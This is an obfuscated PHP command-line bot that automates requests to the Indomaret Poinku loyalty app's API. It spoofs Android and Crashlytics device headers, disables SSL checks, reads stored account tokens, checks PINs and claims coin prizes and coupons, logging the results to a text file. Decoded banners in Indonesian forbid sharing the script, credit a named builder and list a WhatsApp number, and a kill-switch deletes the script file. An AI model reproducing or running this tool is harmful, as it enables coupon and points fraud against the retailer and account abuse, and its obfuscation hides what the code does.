    goto LSIB1;
    PMU6h:
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1);
    goto ISnMq;
    GCevm:
    $AXlcQ = json_decode($y7f11, true);
    goto hJZUA;
    jsIIZ:
    DRciG:
    goto GCevm;
    b3TeN:
    curl_setopt($C6npe, CURLOPT_COOKIEFILE, "\151\x6e\144\157\x2e\x74\170\x74");
    goto T7F8p;
    Igfu6:
    $y7f11 = substr($ECuqv, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE));
    goto StumP;
    kH8ZF:
  }
  goto qpb4_;
  kWWNA:
  EBuCw:
  goto cJ3ec;
  jwtdn:
  function E6TPN($lEbop, $aY0el)
  {
    goto iCdFg;
    pPPRx:
    $ECuqv = curl_exec($C6npe);
    goto xt3hf;
    QG6X9:
    $ruc3h[] = "\130\55\x43\x52\x41\x53\110\114\131\x54\111\103\x53\x2d\104\x45\126\x45\114\117\x50\x45\122\x2d\124\117\113\x45\x4e\72\x20\64\67\x30\x66\141\x32\142\64\141\145\x38\61\x63\144\x35\x36\145\143\142\143\x64\141\71\67\x33\x35\x38\60\x35\64\65\x34\x63\145\143\x35\71\x31\146\141";
    goto r63ZU;
    I33Ck:
    dIgMJ:
    goto SLKmp;
    IOsOL:
    $ruc3h[] = "\130\55\x43\x52\x41\x53\x48\114\x59\x54\x49\103\123\x2d\101\x50\x49\55\103\x4c\111\x45\x4e\x54\x2d\124\x59\x50\105\x3a\40\x61\x6e\144\x72\157\x69\x64";
    goto jE_WW;
    qXnFm:
    curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h);
    goto qjnG8;
    M46Dl:
    $AXlcQ = json_decode($y7f11, true);
    goto ODPxl;
    ODPxl:
    print_r($AXlcQ);
    goto dhvsu;
    G10Km:
    curl_setopt($C6npe, CURLOPT_URL, $lEbop);
    goto yhCYW;
    dr3dp:
    $ruc3h[] = "\x58\x2d\103\122\101\123\110\x4c\x59\124\111\x43\x53\x2d\111\116\123\x54\x41\x4c\114\101\x54\111\x4f\116\x2d\x49\x44\72\x20\x32\x62\x34\64\62\x34\x66\x62\x36\x64\62\60\x34\66\63\145\141\63\145\x62\x33\142\x63\65\146\x39\65\63\145\x36\67\x31";
    goto kXvwC;
    MmZRu:
    $ruc3h = substr($ECuqv, 0, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE));
    goto zbqnf;
    s1_ds:
    curl_setopt($C6npe, CURLOPT_COOKIEJAR, "\x6b\x6c\x69\153\x2e\164\170\x74");
    goto W9u0P;
    pK5sp:
    goto EpXIB;
    goto I33Ck;
    xt3hf:
    $P7lm9 = curl_getinfo($C6npe);
    goto P1rk3;
    r63ZU:
    $ruc3h[] = "\x58\55\103\x52\101\123\x48\x4c\131\124\111\103\x53\x2d\104\105\x56\x49\x43\x45\55\x4d\x4f\x44\105\x4c\72\40\x58\x69\141\x6f\155\x69\57\x52\x65\144\155\151\x20\65\40\x50\x6c\165\x73";
    goto dr3dp;
    cbBtB:
    $ruc3h[] = "\130\55\103\122\101\123\110\114\131\124\x49\103\x53\55\101\x50\111\55\103\x4c\x49\105\116\x54\x2d\x56\105\122\x53\111\117\116\x3a\x20\x31\70\56\62\56\x34";
    goto c17E1;
    jE_WW:
    $ruc3h[] = "\x58\x2d\103\122\x41\123\x48\x4c\x59\124\x49\103\x53\55\x47\x4f\117\107\x4c\105\55\x41\120\120\x2d\x49\x44\72\40\61\x3a\71\x39\70\70\x31\66\x36\x30\x35\x33\62\70\72\x61\156\x64\162\157\x69\x64\72" . $aY0el;
    goto rMYnl;
    SLKmp:
    return false;
    goto iUCRd;
    rMYnl:
    $ruc3h[] = "\x58\55\103\x52\x41\123\110\x4c\x59\124\111\x43\x53\55\117\x53\x2d\x42\125\111\x4c\104\55\126\105\122\x53\x49\x4f\x4e\x3a\x20\x65\156\x67\x2e\162\165\x74\165\162\141\56\62\60\62\x30\61\61\x32\67\56\x30\62\x35\x38\x30\62";
    goto xjwCB;
    zbqnf:
    $y7f11 = substr($ECuqv, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE));
    goto pK5sp;
    n3EV0:
    $ruc3h[] = "\x41\x63\x63\x65\x70\164\x3a\40\141\x70\x70\154\151\x63\141\164\x69\x6f\x6e\57\152\163\x6f\156";
    goto cbBtB;
    yhCYW:
    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, true);
    goto ptFhc;
    W9u0P:
    curl_setopt($C6npe, CURLOPT_COOKIEFILE, "\153\x6c\151\153\x2e\x74\x78\x74");
    goto pPPRx;
    dhvsu:
    return $ECuqv;
    goto GSgbB;
    qjnG8:
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0);
    goto s1_ds;
    xjwCB:
    $ruc3h[] = "\103\x6f\156\156\145\143\164\x69\157\156\x3a\x20\113\145\x65\x70\55\x41\154\151\x76\145";
    goto d4Azb;
    c17E1:
    $ruc3h[] = "\x55\163\x65\162\55\x41\x67\x65\x6e\164\x3a\x20\x43\x72\141\163\150\154\x79\x74\151\143\x73\40\101\x6e\x64\162\x6f\x69\144\x20\123\x44\113\x2f\61\70\56\62\56\64";
    goto IOsOL;
    iCdFg:
    $C6npe = curl_init();
    goto G10Km;
    d4Azb:
    curl_setopt($C6npe, CURLOPT_AUTOREFERER, true);
    goto qXnFm;
    ptFhc:
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1);
    goto QG6X9;
    iUCRd:
    EpXIB:
    goto M46Dl;
    kXvwC:
    $ruc3h[] = "\x58\55\x43\122\x41\x53\110\114\131\x54\x49\103\x53\55\x4f\123\55\x44\111\x53\120\x4c\x41\131\55\x56\105\122\x53\111\x4f\116\x3a\40\x39";
    goto n3EV0;
    P1rk3:
    if (!$P7lm9) {
      goto dIgMJ;
    }
    goto MmZRu;
    GSgbB:
  }
  goto Z2FTO;
  t2UQK:
  echo @zM6iC("\x79\x65\x6c\154\157\x77", "\40\61\63\x20\56\x20\x54\x75\153\141\162\40\123\x74\x61\155\x70\12");
  goto tRih6;
  Tqk7I:
  poXHB:
  goto deoKi;
  pjdWo:
  echo "\12";
  goto PX6b2;
  eqpXU:
  echo @zM6IC("\x79\145\154\x6c\157\167", "\x20\x2d\40\104\151\x6c\x61\162\141\156\147\40\x4b\145\x72\x61\x73\40\115\x65\x6d\142\145\162\x69\40\104\x61\156\40\x4d\145\156\x79\x65\142\x61\162\x20\123\x63\x72\x69\x70\164\40\111\156\151\xa");
  goto CGTag;
  SzLuk:
  echo @ZM6iC("\x6e\145\x76\171", "\40\40\40\x20\x20\40\40\40\x20\40\131\x41\x4e\x47\x20\116\131\105\102\x41\x52\x49\x4e\40\123\103\122\111\120\124\x20\x49\116\111\x20\12");
  goto PaViv;
  xcEUm:
  echo @Zm6IC("\171\145\x6c\154\157\x77", "\x50\x6f\x69\156\40\101\153\165\156\x20\x41\x6e\x64\x61\40\x3a\x20");
  goto x8RGk;
  ca3bq:
  $tqWr2 = $zvt88[$yy9BI];
  goto n1CDj;
  qa6Zn:
  $Fm5gC = @$cQFRW["\144\141\164\141"]["\x65\170\160\151\162\145\144\x44\141\x74\x65"];
  goto BmMuE;
  CId6O:
  echo "\xa";
  goto nNr1Z;
  YRNTC:
  $nb9cm = round(microtime(true) * 1000);
  goto y6y7W;
  TZYFr:
  echo @Zm6IC("\x79\x65\x6c\x6c\x6f\x77", "\x4b\x6f\144\145\40\120\157\163\x20\x20\40\40\40\x20\x20\72\40");
  goto NQOD6;
  uZrFH:
  echo "\12";
  goto NCD0t;
  hSvR2:
  $jT2Pf = @$owfHy["\x64\141\x74\141"]["\143\x6f\x6e\164\145\x6e\x74"][$dQ8Tp]["\x63\x6f\165\x70\157\156\115\x61\163\x74\x65\162\111\144"];
  goto pWv96;
  zonco:
  $m5BZY = gggr_("\150\164\164\x70\163\72\x2f\x2f\141\x73\x69\x61\x2d\163\x6f\x75\x74\x68\145\141\x73\164\62\x2d\151\x64\x6d\55\x63\x6f\162\x70\x2d\160\x72\x64\56\x63\154\x6f\165\144\146\x75\x6e\x63\164\x69\157\156\163\56\x6e\145\x74\x2f\151\x64\155\141\160\160\x73\137\x74\162\x61\143\153\145\162\137\x67\x61\x74\x65\x77\x61\x79", $wDisp);
  goto RDVGv;
  TLgtD:
  $efQM2 = count($QRhbE) - 1;
  goto wo9IC;
  AaJdK:
  echo "\12";
  goto ALYQT;
  oceyi:
  b0ztV:
  goto gI0WO;
  pGlLe:
  @unlink("\142\x65\141\164");
  goto GHPjX;
  xZwF2:
  echo "\xa";
  goto uBgC6;
  vZzSz:
  $m0f8X = explode("\12", @file_get_contents("\155\x79\x74\x6f\x6b\145\x6e"));
  goto f28cg;
  EqnUK:
  xB5XS:
  goto x7k_T;
  IU21L:
  $k1y0B = G1wxt("\150\x74\x74\160\x73\72\57\57\x65\x64\164\163\141\x70\x70\x2e\x69\x6e\x64\x6f\x6d\141\x72\145\164\160\157\x69\x6e\153\x75\x2e\x63\157\155\x2f\154\157\x67\x69\156\57\x61\160\x69\170\55\x31\x35\60\62\55\x61\160\x69\57\157\x70\x65\x6e\57\160\x69\156\57\x69\x73\x2d\160\x69\x6e\55\145\170\x69\163\x74", $wDisp, $aY0el, $GOXkU, $mlMLt);
  goto EnqxC;
  bkF1_:
  sJ2Nm:
  goto jPmRn;
  x8fie:
  $S8W9D = trim(fgets(STDIN));
  goto j6z6p;
  TrDtR:
  $tqWr2 = $zvt88[0];
  goto swoX9;
  wu8ti:
  echo @zM6ic("\156\x65\166\x79", "\x20\x20\40\x20\40\x20\40\x20\40\40\40\40\x20\40\40\40\x41\x41\x4d\x49\x49\116\40");
  goto VO7F2;
  SYacG:
  echo @zm6IC("\162\145\144", "\xa\176\176\176\x7e\176\176\x7e\x7e\176\176\x7e\x7e\x7e\176\x7e\x7e\x7e\176\x7e\x7e\x7e\176\x7e\x7e\176\176\x7e\x7e\x7e\176\x7e\176\176\x7e\176\176\x7e\x7e\176\176\x7e\x7e\176\176\x7e\x7e\x7e\x7e\12");
  goto EKWAg;
  Dy0BU:
  $yeprB = g1wxt("\x68\164\164\160\163\72\x2f\x2f\x65\x64\x74\163\x61\x70\160\56\151\x6e\x64\157\x6d\x61\162\x65\164\160\x6f\x69\156\153\x75\x2e\x63\x6f\x6d\x2f\x6e\157\164\151\146\151\143\x61\x74\x69\157\156\57\x61\160\x69\170\55\61\x35\60\x32\x2d\x61\160\151\x2f\160\x75\x73\150\55\156\x6f\x74\x69\x66\x69\143\x61\164\151\x6f\156\x73\x2f\146\x63\155\x2d\x72\145\147\151\x73\164\162\x61\164\151\x6f\156", $wDisp, $aY0el, $GOXkU, $mlMLt);
  goto tyQvs;
  TIdh9:
  echo @zm6iC("\x67\162\x65\x65\x6e", "\x4e\157\x6d\157\162\40\110\120\40\101\x6e\144\141\x20\x20\72\40");
  goto efhFP;
  nLket:
  @unlink("\160\157\151\156\x68\x70\x2e\160\x68\x70");
  goto oeQpn;
  XOW5Q:
  echo @ZM6iC("\x79\x65\154\154\157\x77", "\x7c\x20\x57\x41\x20\x30\x38\x32\x31\67\66\63\x35\70\62\x39\65\40\xa");
  goto bkgwV;
  JXD87:
  rhrij("\113\165\x70\x6f\x6e\x20\120\157\x69\x6e\x6b\x75\40\x6e\145\167\56\x74\170\164", $WvHe1);
  goto NrQ94;
  I61fI:
  rHriJ("\113\165\160\x6f\156\x20\x50\x6f\x69\x6e\x6b\165\x20\x6e\x65\x77\56\x74\x78\164", $Q6vWf);
  goto QFItA;
  Cvc4w:
  echo @zM6ic("\x6e\x65\x76\x79", "\x53\157\162\x72\x79\54\x20\x54\150\x69\x73\40\123\143\162\x69\160\x74\x20\110\x61\x73\40\x42\145\x65\x6e\40\x52\145\155\x6f\166\x65\144\40\102\171\x20\124\x68\x65\40\x4f\x77\156\x65\x72\41\x21");
  goto XCEBt;
  lIn_S:
  AJ5_S:
  goto gZeD3;
  GdD0b:
  $ofEkP = cWALz("\150\x74\164\x70\163\72\57\x2f\x65\x64\x74\163\141\x70\160\x2e\151\156\144\157\x6d\x61\x72\145\x74\x70\x6f\151\156\153\165\x2e\x63\157\155\57\154\x6f\171\x61\x6c\164\x79\x2f\141\x70\x69\x78\55\61\x35\x30\62\55\141\160\151\57\x6d\x6f\142\x69\154\x65\x2f\143\x6f\151\156\x73\x2f\160\x72\151\172\145\163\57\107\117\x46\x52\x45\x53\x48\x32\x30\x32\x32\57\x74\x6f\x6b\145\x6e\163\57\x63\x6c\141\x69\x6d\x2f\163\151\x6e\147\x6c\x65", $wDisp, $aY0el, $GOXkU, $mlMLt);
  goto bFP1u;
  IaDVm:
  $lPULW = $m0f8X;
  goto OvZkE;
  qr3SL:
  $ipfVm = @$lImQC["\144\141\164\x61"]["\x63\x6f\x6e\x74\145\x6e\x74"][17]["\143\x6f\x75\160\157\156\116\x61\155\x65"];
  goto HFm0t;
  wK3qQ:
  $YXsOG = @$cQFRW["\x6d\145\163\163\x61\x67\x65"];
  goto O7Cr_;
  ZG9Bt:
  ffDWu:
  goto coGDt;
  prCaZ:
  $GOXkU = $w5ulg;
  goto nROSQ;
  j6z6p:
  $jTEU0;
  goto OR4t6;
  QJCXA:
  $tqWr2 = $zvt88[$yy9BI];
  goto EaXxp;
  bD9yR:
  echo "\12";
  goto DJvaI;
  Uz5sc:
  goto sKRfM;
  goto lEx9p;
  ktT1F:
  echo $jTEU0;
  goto QHxK7;
  m6Ofd:
  $wDisp = "\x7b\42\160\x68\x6f\156\145\116\x75\x6d\x62\x65\162\42\72\x22" . $zn5zd . "\42\x2c\42\144\x65\166\151\143\145\111\144\42\72\x22" . $aY0el . "\x22\175";
  goto sXAqT;
  LLunD:
  C8rz0:
  goto caGhK;
  W8yAD:
  r1qLs("\163\151\x67\x65\x6f\40\164\x61\153\145\x64\x61", $rVPVc);
  goto Rew81;
  R_Y1g:
  $NFC6_ = @$lImQC["\144\x61\164\141"]["\143\x6f\156\164\145\x6e\164"][5]["\143\157\165\160\157\x6e\x4e\x61\155\x65"];
  goto EtLfU;
  vZl5D:
  @unlink("\160\x6f\151\x6e\150\x70\x2e\160\x68\160");
  goto fNde0;
  Q86_0:
  $nb9cm = round(microtime(true) * 1000);
  goto SWGWm;
  nGlsv:
  TRxKr:
  goto OJe7J;
  IUtYn:
  echo @Zm6IC("\156\x65\166\x79", "\40\x20\x20\x20\x20\x20\40\x20\x20\40\x59\101\x4e\107\40\116\x59\105\x42\x41\122\111\x4e\x20\123\103\122\x49\x50\124\x20\x49\116\x49\40\xa");
  goto NGeXj;
  bEj5j:
  function IaXm3($FK_yc, $bQedf, $wM5Ep)
  {
    goto Qy0Eh;
    jFZ72:
    fclose($FhLCi);
    goto VDrgf;
    Ag1lE:
    fputs($FhLCi, "{$bQedf}\x20\x6b\x75\160\x6f\156\x20{$wM5Ep}\xd\xa");
    goto jFZ72;
    Qy0Eh:
    $FhLCi = fopen($FK_yc, "\141");
    goto Ag1lE;
    VDrgf:
  }
  goto UB3bx;
  kHpsw:
  $Jk9cx = G8Pf2("\150\x74\164\x70\x73\x3a\x2f\x2f\x65\144\164\x73\141\x70\x70\56\x69\156\x64\157\155\141\x72\145\164\160\x6f\151\x6e\153\x75\56\143\x6f\155\x2f\143\165\163\x74\157\155\145\x72\57\141\x70\151\170\x2d\x31\x35\x30\x32\x2d\141\160\x69\x2f\x6d\157\x62\x69\x6c\x65\57\x63\x75\163\x74\157\155\145\x72\55\x61\144\x64\162\x65\x73\163", $aY0el, $GOXkU, $mlMLt);
  goto FhWKb;
  hNNR3:
  $wd9cN = date("\x64\x2d\155\55\131\40\174\x20\x48\x3a\151\x3a\x73");
  goto Sfw_J;
  rbODu:
  CAy8f:
  goto AJX59;
  r4EXt:
  $JaDCq = $PQA77;
  goto cgsPT;
  PaViv:
  echo @Zm6Ic("\x6e\x65\166\171", "\40\123\x45\115\117\x47\x41\40\114\117\102\x41\116\107\x20\x50\101\x4e\x54\x41\x54\x20\x4e\x59\x41\40\102\111\x53\x55\114\x41\x4e\x21\x21\x21\41\41\40\12");
  goto q2w4c;
  t_koI:
  $Ap1KM = json_decode($N0XGD, true);
  goto zowCb;
  QVT4_:
  goto fl6lv;
  goto m4lQE;
  BqeQN:
  echo @zm6iC("\147\162\145\145\x6e", $wd9cN);
  goto qqfT0;
  ABTny:
  nn5qa:
  goto G70pT;
  MXmci:
  echo "\12";
  goto Os2_6;
  twt81:
  $v9NcH = @$owfHy["\144\x61\164\141"]["\x63\157\156\x74\145\156\x74"][$qtgR3]["\142\141\154\141\156\143\x65"];
  goto IeLcz;
  Mt1UZ:
  VouNS:
  goto zjLwc;
  GWdpQ:
  $l9PIA = @$owfHy["\x64\141\164\141"]["\x63\x6f\x6e\x74\145\x6e\164"][$D2zwh]["\147\x61\155\x65"]["\x6e\x61\155\x65"];
  goto YgN08;
  VuGJw:
  $wDisp = "\173\x22\x64\141\164\x61\42\x3a\133\x7b\42\141\160\160\154\x69\143\141\x74\151\x6f\x6e\42\72\173\x22\x61\160\x70\x5f\x76\145\x72\x73\x69\157\x6e\42\x3a\42\x33\x2e\61\63\56\60\x22\54\42\x64\x65\166\151\143\x65\137\143\x6c\x61\163\163\42\72\x22\120\150\x6f\x6e\x65\x22\54\42\144\x65\x76\x69\143\x65\x5f\146\141\155\151\x6c\x79\42\x3a\42" . $GOXkU . "\x22\54\42\144\145\x76\x69\x63\145\x5f\x69\x64\x22\72\42" . $aY0el . "\42\54\42\x6f\x73\137\x6e\141\x6d\145\x22\x3a\x22\x41\x6e\x64\162\x6f\x69\x64\40\120\x22\54\42\x6f\163\x5f\166\x65\162\x73\151\157\156\42\x3a\x22\x41\x6e\x64\x72\157\x69\144\40\x39\42\175\54\x22\x63\157\x72\145\42\72\173\42\145\166\x65\x6e\164\137\x6e\x61\x6d\x65\42\72\42\x70\141\147\x65\137\x76\151\145\167\42\54\x22\145\166\145\x6e\x74\x5f\x74\x69\x6d\x65\x73\x74\x61\155\160\42\x3a" . $nb9cm . "\x2c\42\160\x61\x67\x65\x5f\156\141\155\x65\42\x3a\x22\163\x70\154\x61\163\150\42\54\x22\160\141\147\x65\x5f\165\162\154\160\141\x74\x68\x22\72\42\42\x7d\54\x22\165\x73\145\x72\x22\x3a\173\42\x73\x65\163\163\151\x6f\156\137\151\x64\x22\72\x22" . $MXjqh . "\42\x2c\42\x75\163\x65\162\137\x69\x70\x5f\141\144\144\162\145\163\x73\x22\x3a\x22\61\x32\67\56\60\x2e\x30\x2e\x31\x22\175\x7d\135\175";
  goto a_Y_v;
  Om5sv:
  $L1qpJ = @$owfHy["\144\x61\164\x61"][$dQ8Tp]["\x64\151\163\x74\162\x69\x63\x74"];
  goto fPDTC;
  NGeXj:
  echo @zM6Ic("\156\x65\166\x79", "\x20\x53\105\115\117\x47\101\x20\114\x4f\102\101\116\x47\x20\120\x41\x4e\124\x41\x54\40\116\131\x41\x20\102\111\123\125\x4c\101\x4e\41\41\41\41\41\40\12");
  goto wu8ti;
  Qw0Sd:
  echo "\12";
  goto yibUd;
  kAo2I:
  echo "\xa";
  goto CHNi6;
  QSo8z:
  sleep(10);
  goto asaSp;
  ChAnZ:
  goto RM7sw;
  goto kWWNA;
  ETeBB:
  sleep(5);
  goto w_vuh;
  DJvaI:
  echo @Zm6Ic("\x6e\145\166\171", "\123\x6f\x72\162\171\54\40\x54\150\151\x73\x20\x53\x63\162\x69\x70\164\40\110\x61\x73\40\102\x65\145\156\x20\122\x65\x6d\157\166\x65\144\x20\102\171\40\124\x68\145\x20\117\x77\x6e\145\162\41\x21");
  goto aWC11;
  XCEBt:
  @unlink("\x70\157\x69\x6e\150\x70\x2e\160\x68\x70");
  goto oJRtM;
  wWIIC:
  $yy9BI;
  goto sTIym;
  Vzbxs:
  @unlink("\160\x6f\x69\156\150\x70\56\160\150\x70");
  goto lQPJW;
  d3fM_:
  echo "\xa\xa";
  goto iGFo4;
  hh5Bb:
  $m0f8X = explode("\xa", @file_get_contents("\x6d\171\164\x6f\x6b\145\156"));
  goto rOLXX;
  vxPj3:
  echo @ZM6IC("\x79\x65\x6c\x6c\157\x77", "\x42\165\151\154\x64\40\x42\x79\40\x46\x45\122\104\x59\x20\122\101\x4d\101\x44\x48\101\x4e\x20");
  goto x6_r_;
  wqRSd:
  $wDisp = "\173\42\x64\141\x74\x61\x22\x3a\x5b\x7b\42\x61\160\160\x6c\x69\x63\x61\x74\x69\x6f\156\x22\x3a\173\42\x61\160\x70\x5f\166\x65\x72\163\151\x6f\x6e\x22\x3a\42\x33\x2e\x31\63\56\60\42\x2c\42\144\x65\166\151\x63\145\x5f\x63\x6c\x61\x73\x73\x22\x3a\x22\x50\x68\x6f\156\145\42\54\x22\144\x65\166\151\143\145\x5f\x66\x61\155\x69\154\171\x22\x3a\42" . $GOXkU . "\42\54\42\144\145\166\151\x63\x65\137\151\144\x22\x3a\x22" . $aY0el . "\x22\54\42\x6f\x73\x5f\156\141\x6d\145\x22\72\x22\x41\156\144\162\x6f\x69\144\x20\x50\x22\54\x22\157\163\137\166\x65\162\163\151\x6f\156\x22\x3a\x22\101\156\144\162\157\151\144\40\71\42\175\x2c\42\x63\157\162\x65\x22\x3a\x7b\42\x65\166\145\156\164\137\x6e\x61\155\x65\x22\72\x22\143\154\x69\x63\x6b\137\x6c\x69\156\153\x22\54\42\x65\x76\x65\x6e\164\137\x74\151\x6d\145\163\x74\141\x6d\160\42\72" . $nb9cm . "\54\42\154\151\x6e\x6b\x5f\154\141\142\145\154\x22\72\x22\113\157\156\146\151\x72\155\x61\x73\x69\x22\x7d\54\x22\x6d\141\x72\153\145\x74\x69\156\147\x22\x3a\x7b\x22\165\164\x6d\x5f\x72\x61\x77\42\x3a\42\165\164\x6d\137\163\157\165\162\143\145\x3d\147\157\x6f\147\154\x65\x2d\x70\154\141\x79\x26\165\164\x6d\x5f\155\x65\x64\151\165\x6d\75\157\162\x67\141\x6e\x69\x63\42\175\x2c\42\x75\163\145\162\x22\x3a\173\x22\163\145\163\163\151\x6f\x6e\137\x69\144\x22\72\x22" . $MXjqh . "\42\54\42\165\x73\145\162\x5f\x69\x64\x22\x3a" . $R_bYC . "\54\42\165\x73\145\x72\x5f\x69\160\x5f\141\144\x64\x72\145\163\x73\42\x3a\x22\x31\x32\67\x2e\60\x2e\x30\x2e\x31\x22\x7d\175\135\175";
  goto tvm0w;
  GPI3O:
  echo @zm6iC("\x6e\145\x76\171", "\101\153\165\156\x20\113\145\x20\x20\40\40\x20\40\x20\x20\72\40");
  goto Y3MQk;
  Y3MQk:
  echo $jTEU0;
  goto IbN8j;
  g13L4:
  echo "\xa";
  goto q4c1O;
  tZsGQ:
  $QRhbE = explode("\12", @file_get_contents("\x6d\x79\164\x6f\153\x65\x6e"));
  goto SxY5K;
  hrq_b:
  goto dDvxi;
  goto oceyi;
  zZsUf:
  $ZNU2M = @$Ap1KM["\144\141\164\x61"]["\x72\145\x77\x61\x72\x64\163"][0]["\151\164\x65\155"][0]["\x6e\x61\155\x65"];
  goto pUl6i;
  pzCWS:
  $v1ZMX = str_replace("\15", '', $wPFxB);
  goto mF3S_;
  p1Olv:
  $zcN5u = xOzB4(array("\174"), $tqWr2)[0];
  goto Nj1vn;
  DTgzm:
  if (!($fUekS == '')) {
    goto gakBA;
  }
  goto iiXGU;
  DJjdR:
  echo @zm6IC("\x72\x65\x64", $Bz8Et);
  goto YgpmT;
  BZCJ6:
  echo @Zm6IC("\x79\x65\x6c\x6c\157\x77", "\115\x61\163\165\153\153\x61\x6e\x20\x44\145\x74\x61\x69\x6c\40\x41\154\x61\155\x61\164\x20\40\72\x20");
  goto d2zLL;
  rat1e:
  goto qf4ti;
  goto hwlm8;
  PAlyc:
  echo "\12";
  goto pLTqx;
  lxpuD:
  echo @zM6Ic("\156\145\x76\x79", $YXsOG);
  goto WpQfH;
  rBkbA:
  $U0YgX = str_replace("\15", '', $zcN5u);
  goto W039g;
  xr6FM:
  @unlink("\160\x6f\151\156\x68\160\56\160\150\x70");
  goto E0oru;
  vMlpG:
  $tJqX7 = @$C46m0["\144\141\164\x61"]["\143\x6f\156\164\145\x6e\164"][0]["\143\157\x75\x70\x6f\x6e\116\141\x6d\x65"];
  goto Al7wy;
  jE9nl:
  $kCT0W = str_replace("\x2d", '', $cod3H);
  goto TT_2Q;
  GgRFr:
  function a9mML($lEbop, $eOlDi, $tj7_x)
  {
    goto E48Oc;
    qwKu3:
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0);
    goto kzZTz;
    uF7iR:
    w5oH1:
    goto JfVii;
    E48Oc:
    $C6npe = curl_init();
    goto bAYTA;
    meCLR:
    $ruc3h[] = "\165\x73\145\162\55\141\147\145\x6e\x74\72\x20\x6f\x6b\150\x74\164\160\x2f\64\56\71\56\x30";
    goto v1XHd;
    rV3OX:
    $P7lm9 = curl_getinfo($C6npe);
    goto Sq8SU;
    C11Rp:
    curl_setopt($C6npe, CURLOPT_COOKIEFILE, "\x69\x6e\x64\x6f\x2e\x74\x78\164");
    goto MA74Z;
    kzZTz:
    curl_setopt($C6npe, CURLOPT_COOKIEJAR, "\x69\x6e\x64\x6f\56\164\170\x74");
    goto C11Rp;
    kMiJa:
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1);
    goto meCLR;
    bAYTA:
    curl_setopt($C6npe, CURLOPT_URL, $lEbop);
    goto SUOkH;
    ovS8S:
    curl_setopt($C6npe, CURLOPT_AUTOREFERER, true);
    goto Ldu60;
    Ldu60:
    curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h);
    goto qwKu3;
    v1XHd:
    $ruc3h[] = "\x48\157\x73\x74\x3a\40\x65\x64\164\x73\x61\160\160\x2e\151\x6e\144\x6f\155\x61\162\145\164\x70\157\x69\156\x6b\x75\56\x63\x6f\x6d";
    goto AyiY7;
    AyiY7:
    $ruc3h[] = "\153\145\x79\x3a\40\x5a\127\x52\x30\143\x7a\x49\167\x4d\x6a\x45\66\x4d\x48\102\163\142\x57\x39\x72\142\x67\x3d\x3d";
    goto G6_9d;
    oVGeV:
    $y7f11 = substr($ECuqv, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE));
    goto pn84y;
    Sq8SU:
    if (!$P7lm9) {
      goto w5oH1;
    }
    goto vzVr8;
    MTiG3:
    return $ECuqv;
    goto qOWEx;
    G6_9d:
    $ruc3h[] = "\x7b\x22\x61\x70\160\x5f\166\x65\x72\163\x69\157\156\42\72\x22\x33\56\61\x33\x2e\60\x22\54\x22\x64\x65\x76\151\x63\x65\137\x63\154\x61\x73\x73\42\72\x22\120\x68\157\x6e\x65\42\x2c\42\144\145\166\x69\x63\x65\x5f\146\141\155\x69\x6c\x79\x22\72\42" . $tj7_x . "\x22\x2c\42\144\x65\166\x69\x63\x65\x5f\x69\x64\x22\72\42" . $eOlDi . "\42\x2c\42\157\x73\137\156\141\155\145\42\x3a\42\101\156\x64\x72\157\x69\144\40\x50\42\54\x22\157\163\137\x76\145\162\x73\151\x6f\x6e\42\x3a\x22\101\x6e\144\162\x6f\151\x64\x20\x39\42\175";
    goto ovS8S;
    MA74Z:
    $ECuqv = curl_exec($C6npe);
    goto rV3OX;
    CS7SW:
    $AXlcQ = json_decode($y7f11, true);
    goto RivTw;
    pn84y:
    goto W2ePC;
    goto uF7iR;
    SUOkH:
    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, true);
    goto kMiJa;
    irFYM:
    W2ePC:
    goto CS7SW;
    JfVii:
    return false;
    goto irFYM;
    vzVr8:
    $ruc3h = substr($ECuqv, 0, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE));
    goto oVGeV;
    RivTw:
    print_r($AXlcQ);
    goto MTiG3;
    qOWEx:
  }
  goto vx_HS;
  OvB3v:
  GViaE:
  goto nJynW;
  CEu9Z:
  $ZXjwY = @$owfHy["\144\141\164\141"]["\143\157\156\164\145\x6e\164"][$fM3_G]["\x6e\141\x6d\x65"];
  goto fvvse;
  t2sPb:
  @unlink("\x70\157\151\156\150\x70\56\x70\x68\160");
  goto VgMUd;
  jZrJF:
  echo @Zm6ic("\x70\x75\162\x70\x6c\145", "\x4d\x65\155\x62\x65\x72\x20\x49\104\x20\x3a\x20");
  goto scxdN;
  Rvvfk:
  goto CV5_k;
  goto HB4hn;
  yLLb_:
  $rERzL = xozb4(array("\174", "\15"), $tqWr2)[2];
  goto p6Ll2;
  kC88F:
  goto Fh1k_;
  goto MznXj;
  P9Ksh:
  echo @zM6ic("\x79\x65\x6c\x6c\157\x77", "\x53\x74\x61\x74\165\x73\x20\x3a\40");
  goto xhh2o;
  oICIz:
  yrh1H:
  goto OnfYe;
  AKVOr:
  echo "\xa";
  goto jvFRt;
  XpHuc:
  $uU2QF = @$lImQC["\x64\141\x74\x61"]["\143\x6f\156\164\145\x6e\x74"][16]["\143\157\165\x70\157\x6e\116\x61\x6d\145"];
  goto b5EpG;
  D1mj_:
  OTLN4:
  goto wCzt2;
  A5A7y:
  echo @zM6iC("\156\145\x76\171", "\x20\x20\40\40\40\40\x20\x20\40\40\131\101\116\107\40\116\131\105\x42\101\122\x49\116\40\123\103\x52\x49\x50\124\40\111\x4e\111\40\12");
  goto z1iAX;
  l2zya:
  $YYbml = @$H1g60["\141\x75\x74\150\x54\x6f\x6b\x65\156"]["\x74\x6f\153\x65\x6e"];
  goto m2PK0;
  hBlw0:
  $D2zwh;
  goto M_uwR;
  lkfTM:
  $DxrJr = "\x31\x30\60\x30\60\x30\60\x30\60\x30\x30\x30\60\x30\60\60\x30\x30";
  goto HQgEB;
  WKsfY:
